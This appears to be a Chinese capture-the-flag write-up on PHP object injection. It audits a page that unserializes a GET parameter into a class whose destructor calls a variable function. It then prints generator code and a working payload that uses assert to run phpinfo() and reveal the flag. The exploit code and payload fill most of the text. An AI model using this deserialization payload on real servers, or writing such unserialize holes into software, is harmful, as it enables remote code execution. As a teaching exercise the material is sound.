time.php?source 源码
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
代码审计
1. 需要我们输入data参数,之后将data参数反序列化执行
2. HelloPhp这个类的析构函数会执行echo $b($a)代码,当b=system,a=phpinfo()时,会执行函数查看到phpinfo界面
3. 可以构建HelloPhp的序列化字符串,data传入时反序列化就会执行析构函数
获取HelloPhp类的序列化字符串:这里屏蔽了system,改用了assert
<?php
class HelloPhp
{
public $a= "phpinfo()";
public $b= "assert";
}
echo serialize(new HelloPhp());
?>
输出
O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
payload:
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
查看phpinfo获取到flag